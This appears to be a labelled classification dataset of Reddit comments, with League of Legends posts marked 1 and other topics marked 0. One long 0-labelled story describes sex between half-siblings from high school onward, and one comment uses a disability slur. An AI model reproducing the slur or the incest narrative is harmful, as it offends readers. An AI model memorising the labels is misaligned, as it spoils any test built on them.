1	EDIT   According to [Riot Nick Allen]( OGN has a 17 year age limit already in place. For much of the post then, you can probably ignore the "Korean and" and attribute the arguments solely to Chinese teams/players. Also if anyone knows where I can find the OGN rules in English anywhere online, I would love it if you could PM me where. :3   EDIT2   K... Something is getting lost in translation between what Riot means by "17-years of age" and what Koreans mean. For those who don't know and haven't seen Monte's explanation, Koreans do age differently from Western countries. You are born a year old due to the 9 months (on average) that you spend in your mother's womb. Koreans are fairly traditional, and the notion of birth at conception has carried over to the legal designation of people's ages. To FURTHER complicate that, Koreans do not count their age by their specific birthdate, but only by their birth year. Everyone born in the same year is treated as the same age generally (you usually call someone born the same year as you is "chingoo" which translates directly as "friend"). Monte AND Nick Allen may both be right here if OGN goes by Korean age and Riot is going by Western age. I'M SURE WE'LL FIND OUT SOON!!!   MAIN BODY   Wickd seems to be missing a point that I think needs to be made pretty clear here. The issue with instituting an age limit that is higher than the one Korean and Chinese teams currently employ in their competitive leagues is that it goes against the  expectations  of Korean and Chinese teams built on  reasonable reliance  of Riot Games. In terms of restitutionary reliance (contract law), when two parties arrange an agreement based on terms and act in reasonable reliance on the other party continuing to abide by those terms, it's not only unethical for one party to unilaterally change those terms, it's generally considered a breach of contract. In layman's terms:   When a party agrees to do  something , the other party is allowed to assume that this  something  will in fact be done.   For example, if I'm looking for a job and interview with an employer, that employer may notify me that I have received the job and given me its assurance that the position is mine. If I then pay considerable expenses to move closer to that job and quit my old job to take it, the employer cannot then say "Oh sorry, we found someone better." If the offer was clear and my actions were reasonable, restitution/equity says I should get the job and most courts will hold that the employer is estopped from denying it to me (or give me damages to make up for it).   Here, Riot has acquiesced in Korean and Chinese professional gaming leagues setting their age limits despite them being lower than NA/EU LCS. Why? Doesn't matter why honestly (though my guess would be to mirror/respect relevant labor laws and cultural approaches). Riot could have (owns the game and provides the content through agent organizations in the two countries) reasonably required a 17+ age cutoff, but did not do so. Because of this, Korean and Chinese teams have acted in reasonable reliance on Riot's position and started 16 year old players with no reason to suspect that those players would not be eligible to play in any future tournaments. In fact, World's last year did not have this age limit, and so prior dealings would suggest the reliance is justified. By making this change now (though I'm guessing teams were notified some time prior), Riot is unilaterally changing the expected terms of performance/course of dealing. As said before, they are probably  legally  allowed to, but from an ethical standpoint it's a violation of these teams' reasonable expectations.   Wickd's point about EU and NA having to deal with these age requirements may be novel, but it's certainly not convincing (at least for me). Age limits in EU and NA are for legal reasons and to respect the education/job culture of Western countries. They are made to protect players from the danger that comes with commitments like being a professional gamer at an early age. That being said, the teams  WERE  allowed to start players younger than the LCS-required age, and are allowed to groom those players on challenger teams to get competitive gaming experience. This of course is nowhere near the experience of an LCS player, but their expectation of being able to play is not at all violated. Teams contract with Riot with the understanding that their players must be 17 years old, and because of that pay their own expenses to groom younger players as prospects. This system is not only healthier, it allows teams to use these players in international tournaments if they would choose to do so. Remember, Rekkles was  ALLOWED  to play in S3 World's but  CHOSE NOT TO  to respect Puszu's role in the team.
0	i've only been in danger of being hit by a car in a building one time. ONE TIME. and it was a woman in one of the larger jeep options. her gas pedal was "stuck", or so she said, but she did immediately reverse out into the parking spot and started calling insurance and husband.
0	I didn't so much mean as they are ants to be ignored, I was more going with... well in another question someone asks why don't we understand why doesn't God just kill those souls or demons or the devil in hell, and my thoughts always been if you get bit by those ants in your ant farm, you don't (for the most part) try to kill them all. You know that they are there, and that that's in their capacity to turn on you and hurt you. But you won't be sticking your hand amongst them to be get bit. You'll remove yourself from their presence all the while cognizant of their existence.. And if an ant could think, maybe it would say, where might be that huge warm thing I was gnawing on a second ago...It's gone.   Then after a couple of generations, maybe those ants will be like, "Wonder how the hell we got in this farm..."
0	Growing up I had a best friend that I spent all of my time with.  I never really questioned how we became such good friends until after we discovered that we were siblings.  I remember the first time I ever met her.  My mom started babysitting Amy (let's just call her Amy) when I was 9 or 10 and really pushed for us to become friends even though I remember hating girls at the time.  I mean she was at the house everyday and my mom always made sure that we were getting along and having fun.   Fast forward to high school.  We became best friends over the years.  People always joked about how I was whipped, in the friendzone, other things like that.  Everyone just thought that I was waiting on her to come around.  But that wasn't the case at all.  Neither of us had any interest in anyone else other than each other.  It still blows my mind to this day because she was and still is one of the most attractive females I have ever seen and I have always just been an average looking guy.   Amy would come over to the house everyday after school.  We would go out to the city on the weekends after I got a car.  We never made contact with each other and we never discussed how we felt about each other but we always knew.   One night, in the spring of our senior year, Amy and I went pool hoping with a few friends from the neighborhood.  It as cold!  We ran back to my house and climbed back in through the window like we always did.  She started to strip and I wasn't surprised, I had seen her naked many times.  But this night as different.  The vibes were unique to our friendship.   I started to take off my clothes also, to change.  Then we made eye contact and I guess you could say "it was on."   The funny thing about it is that we were both virgins and it was still the wildest sex I have ever had to date.  All the sex that followed was never as good as it as that night.   Things were never awkward after that.  At school and home we acted the same except we would have sex when no one was around.  We never discussed dating or anything but I think that we both knew that we were in a relationship and that was all that mattered.   I asked Amy to prom and she said yes.  My mom wanted to take all of these pictures so I picked up Amy, got "the talk" from her father figure (not her father I will explain), and then went back to my house.  My mom took all of these pictures and made a comment that I will never forget but it had no meaning at the time.  She said, "Seeing you two together after all of these years has made me the happiest mother.  Amy, even though you're not my daughter you've always felt like one."  Then Amy and my mom cried together before we left for prom. We graduated.  That day after all of the lunches with the relatives and after all of my annoying friends left, Amy ended up at my house.  My mom had been in a weird mood all day but I just thought it was because I was graduating.  Late in the afternoon Amy and I returned from somewhere (the gas station I think) and both of our mothers were sitting on the couch.  This wasn't strange but we were told to sit immediately after walking into the house.   We all sat around talking and laughing for a few minutes.  It was a happy conversation.  Then my mom spoke up.  She started to cry as she told us how happy that Amy and I make her.  How our friendship has kept her positive through the years after my father died.   Sorry, reddit I guess now is the best time to tell you that I never met my dad and Amy's dad had also died before she met him.  We always thought this was interesting but we never talked about it.  Ever.  I don't think we saw the point because neither of us had a father.   Back to "the talk."  Amy's mom was pretty silent through all of this.  No tears, no comment, nothing.  Neither of our mothers knew that we had been having sex and pseudo dating.  Then my mom started talking about my dad and said, "When I was pregnant, before your father died I learned that he as seeing another woman.  But I was never able to figure out who she was and after your father died I really didn't care anymore."   The conversation got a little serious at this point and I didn't really understand the purpose.  She continued for a few minute talking about my dad and then said, "It wasn't until last summer that Carrie (We will call Amy's mom) and I discovered that we had both dated your father before the two of you were born."   I remember responding with "That's kind of weird or something like that."  And then it hit me.  I looked over at Amy and she had the most horrified face that I have ever seen.  The worse part is that she looked mad at me. My mom continued to explain for a moment before saying, "Carrie and I believe that you two are brother and sister."   Amy asked, "How can you be sure?"   Then my mom pulled out two letters.  One addressed to her and the other to Carrie.  And she said, "These are from your father."   Amy started to cry.  She always cried the same growing up and I never saw her cry like this.  She was shaking and turning extremely red.  I think he was even having trouble breathing.  My mom and Carrie tried to consult her before she ran out.   They ended up following her.  It was just me in an empty room with two twenty year old letters.  I snatched up the one written to my mom.  I read it.  My dad confessed to seeing another woman and getting her pregnant as well (I am just a few weeks older).  My dad said that he wanted to do the right thing and be there for both of his kids and that he understand the ramifications of his actions.  Then I read Carrie's letter.  It was short and my father explained that he made an error in judgment but he was not going to leave Carrie alone.  He wanted to raise his child with her as well.   After reading these I was shocked.  I just sat there for hours until my mom finally came home.  I didn't know what to say to Amy, or if I could even ay anything to her.  I sat there for hours talking to my mom about dad and Amy.   Two days later Amy called and she wanted to talk.  She came over and we laid in bed all day just talking like always.  She told me how much she loved me and that she always saw a future with us.  It was a bummer.  I was heartbroken because I was getting dumbed but I couldn't fight it because I didn't know how I felt.  Even after we talked about everything she never left.  Not a single day passed that summer that she wasn't with me. There was still a lot of physical attraction and we acted on it often.  Sometimes we would laugh afterwards, sometimes we would cry and discuss society and how no one would understand.   It was the best summer of my life.  But then she left.   We talked about going to the same college.  We both applied and got in.  I was ready to go and so was she.  The night we were set to leave she arrived with no bags, none of her things, just a letter.  She handed it to me and walked away.  I tried to stop her to figure out what was going on but she didn't say a word.  I walked with her all the way back to her house trying to get her to speak but she wouldn't.   We reached her door, she grabbed my hand and just said, "Remember that month that we binged watch the first few seasons of One Tree Hill?"   I nodded.  This would have been freshman year of high school.  She hated One Tree Hill and made so much fun of me for liking I but she always sat there with me anyways.   She continued, "That's when I fell in love with you."  She kissed me and walked inside.   I walked home heartbroken and confused.  I was supposed to leave for college the next day and I didn't know if I even wanted to.   The next day came.  I decided that I was leaving but I wanted to say bye to Amy so I went to her house.  She had already left and Carrie asked why Amy didn't tell me she was leaving for a school that I had no idea she applied to.  I had no clue.   I didn't read Amy's letter until that night.  I have had a rough time since then.  She has also.  We have spoken since.  Rarely, about us but mostly about wanting to see each other and move back home.   Originally, this post was meant to be comical but halfway through it I realized that I wasn't laughing.  I miss her.  Now I don't know if I want to post this and where I should if.
0	Exactly.  I was in a relationship with a guy all through college.  He was and still is one of my best friends and we were very well matched but we both knew about 8 or 9 months into our almost 4 year long relationship that we were not going to get married.  He wasn't sure he really ever wanted to get married and while it was something I did want  eventually  it was not really a priority at the time.  Additionally, while we worked incredibly well as a dating couple, there were some major difference in things like how we handled finances, how we felt about kids and so forth that don't come up when you're just dating that made it obvious that a marriage between us would not be the best of plans.   Once we entered our 20s people began to ask when we would get engaged/married to which we would always reply "We're not."  The most common reaction to this was "Then what's the point?" The point was that we loved each other, were best friends, and there was no one else we wanted to be with.  Marriage was not a priority for us at the time and the idea of breaking up just for that reason and having to see each other all the time (lots of the same friends, very small campus) would have been torture.  We broke up a couple months after graduation when he moved across the country for grad school, gave each other some distance, and are now good friends again.   Now that I'm older, finding the person I want to spend my life with is slowly moving up my priority list so that now if I were to realize a few months into a relationship that it was headed no where, I would end it.  I don't regret a single day with my ex.  That relationship taught me a lot about myself and what I wanted out of life as well as how to be in a healthy, monogamous relationship.  But priorities change and not everyone has the same views on marriage.
0	actually, as proteins coagulate (cook) they squeeze out water in the meat so the more well done it is, the drier it is.  however, those parts of the bird that are submerged in broth will suck in water as osmosis attempts to balance the saline concentrations. additionally, the more connective tissue in the meat, the better it responds to long, wet, low-heat cooking, "tenderizing" and "moisturizing" the meat.   source: im a chef
0	Green Vibrance,   You can get an economy size at your local CVS/Vitaminshoppe/GNC/etc.   Make her a fruit/protein smoothie in the mornings and add spoon of this probiotic stuff. Her smells will go away in a few weeks.
1	Are you kidding me? Fearless is absolutely right. If someone is spectating me I could be the ADC focusing on farm and because of my OWN unskilled map awareness I get ganked by a Kha'zix I should've seen on the minimap but luckily coach is there to warn me "stay back he's coming bot or he's in the area", that right there just screwed that Kha over, so what if he walked through a ward? You're the one who neglected to abuse that information and he deserves the free kill on you so you learn your lesson?   Or what if he tells you information you wouldn't otherwise know for being ignorant? Such as when to expect a typical gank or when the enemy jungle is most likely at a section of the map. Its just the little things amateurs don't know and would need to learn that someone coaching in real time could essentially just take the role as their map watcher or something silly. Riot added buff timers because they didn't like some players having an advantage others may not know of/be unable to use themselves, making the game unfair.
1	I agree with what Elementz did but the biggest reason why Chauster's reputation went down was because he cheated by playing on his girlfriend's account (Missy) in a Girl4LoL tournament and he claimed Missy was a better support than Elementz when she got carried to like 1800 by every CLG member. At best she was a 1200 player.
0	I logged in just to comment because HOLY HELL, these comments are ridiculous. For the sake of your relationship, read this!   I cannot speak for all women but can attest to myself and a lot of other ladies out there. Most of the time we make logical connections and thoughts. For instance, my boyfriend likes admiring beautiful women but we love each other and trust each other, so this is ok.   However, sometimes our feelings get in the way of logic. We don't like it either, but its how it is. I know you all you males calling this woman crazy always perfectly manage all of your hormones (especially that testosterone), have never accidentally over-reacted, would never act out in jealousy, and can always perfectly articulate your emotions, so please have patience with us crazy women.   We may get upset and often the feelings are immediate. We do not always have time to work out the exact root of the feeling or work through them before they strike, but that does not mean they are crazy or should be ignored. Something can irk us about a situation and strike something deep down. I tell this to my boyfriend all the time when I'm upset and he's confused. When I was younger, it just used to turn into big arguments. I would act out before I could even process exactly what I was upset about and he would respond in equal aggression. Usually, my insecurity was a big part but I didn't know who to "blame" for that. Both of us have grown and I have more of an understanding of myself and can say "I'm upset, let me take some time and work through it, because right now I'll just yell." A bit later, I can tell him what bothered me and together we work through it. He has grown to not belittle or ignore my emotions but instead to acknowledge them and work to find the root issue, even if there is confusion for a while. Also, because he is human and cannot always perfectly articulate his feelings either, I do the same for him when he's upset! Though sometimes we mess up (usually when alcohol is involved). Regardless he would NEVER  post a meme about it.   I have been in a very similar situation with my boyfriend before. We were with a group who wanted to go to a strip club. Logically, I was completely fine with it and fully believed there would be no issues. However, I did not realize how much it would bother me to see my boyfriend lust after others. This is and instance when feelings of jealousy and also insecurity sometimes overcome the logic of the situation. But like a champ, when he noticed it bothered me, he did not stare ridiculously long at the women. Yeah he looked around frequently, but always made sure to maintain conversation with me, give me kisses, and look more at me than the strippers. Were they more attractive than me? Yes. Would he have stared more if I wasn't there? Yes. But out of respect for me, he put me first and it was actually a great night. He stil saw lots of naked ladies but I still felt like I was his number one. If he would have spent the whole night just staring.... probably not.   I HIGHLY doubt this was a "trap". I'm guessing your girlfriend logically knew that the strippers didn't affect your feelings about her (hopefully). However, she is allowed to feel uncomfortable and insecure when she sees you staring at half naked women. Should she freak out? Probably not. But she is human and jealousy and insecurity are very potent emotions, especially on alcohol. And if she seemed bothered, you didn't HAVE to stare. Your SO was still right there, and I'm sure you would feel uncomfortable in a similar situation. I generally think looking is fine, and in strip clubs, extra looking is totally fine. Staring all night with your SO right there is a bit rude though. She was wrong about enjoying going to a strip club and it bothered her more than she thought it would and hopefully in the future both of you work to come to the root of emotions and you don't just play the blame game.
0	My dad and I once saw a woman at Walmart pushing her cart to the corral. Instead of pushing it securely inside, she attempted to just let it roll into the corral. It ended up running into an Acura nsx. She ran over and grabbed it and did THE EXACT SAME THING. It ran into the fucking car again. She just got in her car and drove off. We got both license plates and informed the police of what happened. But we never heard anything after that.
1	So.. My first "elo" was Silver, and I remember people being a pain in the ass. In pre-season I got to gold and I still faced a lot of toxic players, this was when I started muting.   In this season I got to D5 and I realized the BEST thing I have ever done was muting the ALL CHAT. Trust me, just disable that shit. It has no utility.   Whenever someone sounds like a jerk I just mute them and w/e.
1	Me and some friends were playing a normal, and were getting beat pretty bad. I had said as a joke to them, "the only way we're gonna win this is if their entire team disconnects". A few seconds later 4 our of 5 of them disconnect, leaving a poor lone kassadin to fend for himself. Needless to say we steamrolled over him and won.
1	I'd like to point out that there is diminishing returns on targon's. When you have  1 targon-holder,  that person can and should take all the cannon minions (which is the best possible payout), and a few melee minion in between. The targon holder would try not to use its charges on ranged minions because they give a less split-payout overall.   When you have 2 targons, the 2nd one doesn't really give you anything extra on the big minion because the first targon holder should always maintain 1 charge ready for them anyways. Therefore, the 2nd targon is always going to be using his charges on melee/ranged. If even this isn't communicated and executed properly, then theres going to be even more confusion and lower efficiency   Secondly, unless you have godlike communication with random solo queue teammates and is able to coordinate in such a way that the targon-holder with no charge would always be the one to CS a ranged minion, you end up wasting charges on the lowest gold yielding creep. This is even worse at bot lane because, unlike top lane, where you have 2 bruisers who both scale at a relatively similar pace and could therefore have no problem with either person taking the cs , you want to funnel all of the non-targon-charge last hits on your AD. This means that the AD would indiscriminately use his charges on all ranged minions even if his support has no charge to expend on.   Now, you might think...oh what's the chance of that happening? Remember that anyone with a targon is going to compete for melee minions and avoid ranged. They also do not want to have max stack (2 or 4) of charges because it would waste their charge-regeneration. In essence, you are ALWAYS facing the question of "do i want to use my charge on a ranged, or hold on to it and possible waste charge-regeneration until the next wave arrive".  Then you add in more complications such as ganks and interaction with enemy laners, shortening your window of efficient targon farming   To rephrase, at top lane, whoever does not have a charge should get the ranged minion as to not waste any charges for melee/cannon. But at bot lane, even if the AD has a targon charge while his support does not, he would still not try to conserve his charge and let the support take the cs. AD's personal income is still more important than bot lane's aggregate income
1	everytime playing a ranked game, or sometimes even a normal i would die a little inside because of sooooo bad behavior of some people. that, combinied with the constant threat that a single game could carry 40 or 50 minutes without any success made me terrified of ranked and i was about to just say fuck this shit and uninstall. Then came aram, and i could play again. 100% teamfights, an a game usually goes 20-30 minutes. A loss can be dealt with much more easier here, by everyone. No trolls, some (not much) rude behavior. sooooooo much easier to cope with.
1	My friend and I queued up for a ranked game and we ended up getting another group of duo queuers who were randoming, so we said fuck it and we randomed and we both got supports. In the game everybody went mid and us and the other duo queuers all bought recommended items on mostly supports. We were at one point 10+ kills down and we ended up winning the game.
0	Why do you believe it's going to happen anyway?  The government can continue to borrow forever and it won't default on it's loans unless idiot politicians CHOOSE to default on the loans and want to cost the country more money.  $17 trillion in debt is a big scary number, but it's actually not impossible to manage. Depending on the projection, the debt is between 90-110% of GDP. It's not the same thing, but since people always like to compare governments to households: That's like a household with a $50,000 income taking out a $55,000 loan. That's a manageable amount of debt for the household.  It becomes even more manageable if the household is comprised of a bunch of immortals (the government doesn't have to worry about a deadline to pay back loans - if the loan has a term and the government can't pay it by the deadline, it can take out another loan to pay it off - if bonds are due, sell more bonds to pay them off) It gets even easier if the household gets to set policies that determine the value of the currency in which the debt is recorded.   What is important is the amount of money spent each year to service the debt - because that hits the budget annually. In 2013, that was about $250 billion in interest payments, or about 6.5% of total federal expenditures and about 27% of the deficit for last year.  Even that isn't as bad as it looks because the vast majority of public debt is held domestically. So paying interest on the debt is literally the government paying into your managed retirement plan or into the hands of American investors. It doesn't stimulate private sector growth in the same way as direct expenditure would (e.g. buying fighter jets from Lockheed Martin), but it's still dollars in the hands of Americans.  On the other hand, reducing spending has a negative impact on the economy. Reducing spending means the government stops being a customer in a lot of markets, which has a directly negative impact on the private sector. It means that government employees are laid off, added to unemployment roles and have less disposable income to spend. Thousands of newly unemployed workers will start a ripple effect in local economies in areas where former government employees live and worked - closing local businesses and laying off more workers.  The bigger effect on the entire nation will be from the government ceasing to be a customer which will cause negative effects across multiple industries and can lead to recession.  Recession means that the debt becomes a greater percentage of GDP and becomes less manageable...you can see where this is going
1	Buying is okay but i think investment can fail if marioIsDead wont find fun in game. Until now i purchased whole [100 PLN]( in about 2y playing, bought few champs, unlocked free 975 RP at Invite-A-Friend 1.0 programme or RiOT, and i hardly suggest of just plaing, all 450 Ip heroes are still playable, price in LoL means only about time when they was spotlighted - newest are just new, thats all.   Through that time i have played with/against all champions, but the most meaning thing for me was ONE champion that i have fell in love and that's it - you play THAT champ, you will not even notice when 6300 IP appear(maybe you'll find new love?) The tip is, dont buy much, if you really want to buy skins, do that to the champs that you are the most powerfull with and only at 50% sales - yes it will take a while but there is no reason to hurry, beter skins may came untill and you wont regret then (if its your best champ that you are playing with - you dont need skin, it gives only satisfacion)
0	Listen to me. I work in fast food. I actually kind of love my job. My managers are great, and I'm friends with some of them outside of work.. I can't complain.   Now I'll be honest. I don't care about most people that come in. I've been there way too long. I am rarely rude and I will not screw you over for no reason, but if you're nice to me and I like you then you  are  going to get special treatment. That's it. You want extra sauce? No problem. We have pie but the date stickers say we can't sell them? Have them for free. You want a substitution? I'll make sure it happens. I will make sure your meal is fantastic. But it also goes the other way. As soon as you get on my nerves, you're paying for sauce (not really, I don't usually make people pay for sauce, but it's pretty much up to me so don't fuck around), you're not getting those pies that you can clearly see, and I'm calling my manager to tell you "No" for me. And remember, I've been working with my managers for years. They are totally on my side, end of story. I'm actually going to complain to them about you later and we're going to laugh about it.   But I swear I am nice most of the time. :)
1	That MF is retarded. She could have kited and put down her E in every instance. There was no reason to ult because the damage is complete shit at this stage.
1	I just dislike people who say "gg" without meaning it in the slightest. (As in "lol gg noobs l2p")   Also it's pretty annoying when people say "gg" preemptively. They ace our team and take out an inhib and just go "gg." I've had so many games where they pushed into our base, said "gg," then we turned around and aced them and won.
1	Actually, I expected this argument and was excited for it.   crackes knuckles  Here's the thing kiddo, Riot uses a system of project management/software development known as SCRUM.  Within SCRUM organizations are broken down into  small teams  which are then assigned tasks.  The tasks in this case would be like:     Pulsefire modeling   Pulsefire SFX   Pulsefire Animations   Pulsefire Engine Triggers   Pulsefire Particles  and each could have as many as 5 people working on it or as few as one in any given "Sprint".  So even though the company itself is a respectable size, the team working on this skin was probably fairly small.  Not to mention that there are dependencies within each of these.  For example, the animations need the model and rigging to be done, the particles need the animations to be done, the SFX need the animations to be done, I have no idea where the engine triggers fit in here either.
1	I feel like this is just a continuation of the nerfs to junglers. Lets face it, a jungler's job primarily is to snowball lanes early and basically just keep up in xp and stay relevant in gold. Lets say a jungler get a couple good ganks off early top lane and they get top tower at 9:00, the enemy top laner can just freeze the lane down by the inner turret and farm for the next 15 minutes and can stay relatively safe given the fact that it is risky to gank that deep in enemy territory. If their top laner is, lets say, Nasus he can free farm and get huge even if lane is lost. Same goes for bottom lane. A farmed ADC is a fed ADC so getting them behind only means they farm for 15+ minutes and return to the game strong as ever. This especially works since applying pressure to turrets in the current meta can be difficult with the popularity of wave clear heavy midlaners holding out for the team to catch up. Also many popular junglers fall off late game with the exception of champions like VI who own team fights.
1	If he's picked before you've picked your champ, go for a late game champ that can survive lane phase solidly or a good ranged champ. Examples are Trynd, Aatrox, Trundle, Quinn and Ryze. Quinn can abuse any melee top laner to a comical degree and ryze is a great example of both ranged harass and great late game. Splitpushers can be very frustrating for Renekton as if he wants a good chance of securing and carrying a game, he needs to stomp lane and then help out other lanes to win so that the mid game is a complete stomp. If it gets to late game, he needs to have his other lanes strong as well because no matter how fed, after a certain point Renekton can't carry, not to say he can't contribute, but he cannot win the game alone like an apc can. Splitpushers are good for this because if you are constantly threatening towers and inhibs in the mid game, his roam potential is limited and you have a better chance at keeping him from other lanes.   Once the game starts, you need to understand that in a completely fair scenario, it will be very very hard for you to full out win lane. If you are on certain champs and get some ganks it's certainly possible, but if it seems like you aren't going to get that advantage just focus heavily on farming and playing safe. Most times Renektons will push up and harass heavily because if they are good they know that their objective is to win lane and draw heavy jungle pressure top so that they are a force in the mid game and have helped their carries get big. Just try to mitigate this as much as possible (this is where being ranged helps), farm under tower and keep high health. DO NOT stay under tower at 30%, you will get dived and die. 50% can be risky as well as he might call up his jungler for the dive as well. It may sound lame to say just wait it out, but unless he makes mistakes or you are on one of those heavy ranged harass champs, it is very hard to beat out his early game. If you don't give him a significant advantage, at around lvl 9-11 you will start to be able to fight back and maybe take advantage of the fact that he may still be over-confident.   Personally I love playing shyv into renekton. I know both sides of the matchup VERY well, know the windows of opportunity and levels of strength. At lvls 1 and 2, if you play aggressively as shyv you can actually get an extremely early kill if he underestimates you. At around 9-11 depending on how the games been going you will start to win trades and in the late game you will utterly dominate him and bring much much more to your team than him. In summation, shyv wins late and doesn't really have to lose that hard early if you play it right.   Sorry for the wall of text
0	I do get booty calls... But it usually goes something like this: get text saying "hey I have the place to myself". I dont answer for 2 hours while I try to desperately try to find out if anyone hotter will bang me. When the answer is "no", I realize I am too sober to bang this chick, pound back 3 or 4 beers in rapid succession and text back "on my way"
0	If the pets get returned to shelter because of making the barrier too low, it would not be working against them. Remember too that they are entrusting the life of animals to total strangers. Some of the stories here sound like over-zealousness on the shelters' applications of policy. They are making sure the adopters are actually who they claim to be, not lab animal adopters or fight dog trainers or hoarders. It is imperfect. The animal will be with you for a long time & you will be entrusted with its well-being, now and in its sunset years. I don't think it is too inconvenient to make sure it is a good fit.   Have you seen the insane number of 2 year old cats in shelters? Oh, cat no longer kitten-cute but still crawls up my leg? Feh, bring it back to the shelter!   But all in all, seeing an animal go to a subpar situation is better than the alternative.
0	Maybe, maybe not. I went to school, for 7 years, with a massive asshole/bully who was also autistic and used his condition to avoid responsibility for his actions. His dad openly disliked him and his home life was really fucked up, so I can see why he was a huge dick, but that's not an excuse for instigating shit everyday. He has since been "dismissed" from two universities for "misconduct", this is what they call being expelled for sexual assault after your parents make a large donation.
0	Honestly, what jobs don't take some amount of dedication, initiative, or sacrifice? Many supply goods that people rely on daily.  I don't see why that is any less valuable than something militarily related.
1	This is gonna be a long rant, sorry all. ELO hell is not a place. It's a mindset. Everyone thinks they're in ELO hell. People complaining, trolling, etc is hell. People in different ELO ranges tend to act similarly to each other. They form a mindset for that ELO. If you abuse how your ELO works, you'll climb. I learned that recently. One guy feeding one game cause it's a terrible matchup(ie lee sin vs wukong) doesn't mean youre in ELO hell. Someone will always be better than you. That matchup happened today. I was Lee Sin. Crushed everyone after completely wrecking Wu. 2. This 1350 vs 1350 crap you talked about, yea, no. I'm 875 ELO. I was 800, won 5 games in a row. I duo que, with 1200-1400 Elo friends. I win my lane. A lot. Does that mean my team sucks when I lose? No. I didn't do enough for the team to help them. I've literally gone 39/6/11 or something rather as LB and lost. That's when I stopped blaming my team for everything. Even though I could take out both ad and ap carry before a fight ensued, we'd still lose because I didn't help out enough early game. The whole carry yourself out thing is bs. So is the idea about matching yourself up with others based on common roles. Break the meta, fuck it, or learn to play all roles. That's what I did. I practiced in normals and now I'm back I'm ranked, climbing. Remember how I said abuse the ELO you're in? People in mine like to say top or mid before hello. 1 word. That's all they give. But, if you use positive reinforcement and learn to play any role, people will be happy. No one does this in my range so the other team falls apart quickly and points fingers. I'm usually last pick. I can play any role. I have 85 champs or so. I'm ready for what comes at me. Sorry if I sound like I'm bragging, I'm not. I'm saying learn every role. 5 ad carries aren't gonna cut it. (although 5 support seems to work well). I'm saying ELO is a number. Someone said to me "oh you've been 800 ELO for 5 months trolol". Yup, I was. I didn't touch ranked for several months. I learned every role, how to farm, ward, freeze lanes, counter pick, etc and came back to ranked. I was 575 ELO once. My irl friend dragged me into ranked. I didn't even know what Elo was at the time. We had a dodger. He got put on other team. I completely annihilated him. People have said " oh look last pick is a lol guru" then I carry them because none of THEM wanted to ad carry.
0	But two people only one standard deviation from the center on each side vary by 320 calories burned per day. In only 11 days, the person with the lower metabolism will have gained one more pound than the other person (assuming exact same diet and level of activity). A pound every week and a half really adds up over the years.
0	Rogers called me the other day and tried to sell me a $5 add on to my cell plan that would reduce the amount it costs per minute to call long distance or out of country. I never call anybody out of the country ever, or at least I haven't in years. I don't plan on it either.   I told the girl this and she insisted I would be saving a bunch of money with this new add-on to my plan...which is an extra $5 a month. I had to explain to her pretty well that I never call long distance so I wouldn't be saving any money at all. She tried to add in...."well, for the rare time you will call long distance this plan will greatly help".   I had to make it verrrry clear I didn't want the add-on, explaining that even if I do make a long distance call once or twice it wouldn't even compare to having to pay an extra $5 a month.   Even at the end of the conversation, she said, "So, we'll be adding this onto your bill for you. You will be saving."   They've been trying to contact me for like weeks but I kept ducking the number because I didn't know who it was, plus they never left me a voice mail letting me know. When I picked up the phone and she told me how glad she was to finally get in contact with me I thought it would be way more important than what it was.....   Not to make a huge complaint about Rogers or anything though, this is the first time they've tried to sell me something like that. If I made out of country calls all the time I WOULD be saving money, but I don't.   Edit: It's her job to sell hard, I get that. I'm just giving an example of what I experienced.
0	I wouldn't put it past him to do something like that. The past few times he came over for the weekend to hang out (he doesn't live in the same town as me) he eats my leftover food, drinks my beer and doesn't pay for any of it. I've gotten to the point where I don't let him visit anymore...   EDIT: Let me clarify something. I'm a college student, and food is a bit of an expense. The fact of the matter is, he comes over and eats any kind of food I have, not just leftovers. It would be fine if it were once or twice but he has done it multiple times. This includes liquor too. He's even requested that I pick up his tab at restaurants a couple of times, which I obviously refuse because he won't spot me on a meal in return. Oh, and he's also requested me to buy him a few drinks at the bar, which would have been fine if he would pick up the next round, but he doesn't, and never would.
0	Slow down, Sherlock.  You're missing details/timeline.  She kept her marriage a secret, saying the father was in prison for the duration of their relationship.   First forward to this morning, and the husband walking in. OP didn't stick around for explanations, but called Scumbag Stacy after leaving, and that was when she fed him the deployment story.   Honestly, I wouldn't even blame OP if he got details of the deployment story wrong, given the emotional upheaval he was likely experiencing in that moment.
1	As another female who is obsessed with Lol, I'm lucky in that my family doesn't care about it. My mom even listens to funny anecdotes I tell her about the silly/stupid things people do ingame.   My rl guy friends don't care either. For me its my female friends. The get this tone in their voice that just says they are judging me whenever I mention the game. Its frustrating because I love them, their my friends, but what is so wrong with me like something they don't like.
1	There is no way you could have context placed in 2 letters said by the opposing team. You have no clue if they are saying "gg" in a snickering way boasting how they had a good game and you were helpless to stop it, or if they are saying "gg" in a kinda manner commemorating you for trying their best to keep the game close despite your disadvantage. It's the same with "bg". It could be either they are sour for losing when they were disadvantaged and act like that game didn't matter, seeing as it was "bad", or if they thought they played badly and made rookie mistakes which caused the game be that less close.
0	Thank you for posting your research. As an Australian ginger, I can certainly relate. To put it in perspective, I'll get visibly burnt from no more than 5 minutes direct sun, or even just cumulatively throughout the day.   More annoyingly, I pink up nicely around my eyes, cheeks and nose after my 20 minute motorcycle commute to work, *even with my [tinted gold iridium visor]( Is this my visor being crappy or just my hyper pasty skin?
1	Lee retreated towards jng   Lee had more HP/Boxbox near death   Lee is  most likely  thinking: "I can execute Jase with Q > Q"   Boxbox due to experience/skill/clairvoyance guesses/predicts what Lee is planning (above)     = Boxbox outplays Lee because he knows what Lee will do. Jukes the Q with Flash and comboes Lee to death. edit: formatting
0	Absolutely. But only if you link to a screenshot of me giving you permission in the comments. After that is done, we then have to go to the founder, /r/Lighetto , and post a screenshot of him giving permission to let me give you permission in the comments.
1	I'm on the tiger hype train right now because I feel wayyyy too strong with it in games. I feel like I haven't had such an easy carry jungle since vi was in her strongest state, or hecarim before everyone knew about how strong he was with elder. Xin for that matter was also really strong earlier in this season.   The main thing is that tiger udyr thrives off early game and taking objectives as well as shutting down people in duels and ganks. If you don't do calculated aggression, you aren't using him to his potential.   I'd just use tiger whenever. It does more damage than phoenix if you queue tiger procs(you could do the same with phoenix), and you build tanky anyway because if you are tanky you last longer and deal more damage because of bear peel, tiger, and turtle shields that last for days. Phoenix can still win in duels, but you have to play smarter. Phoenix only has better clear speed IMO.   A lot of rambling there.
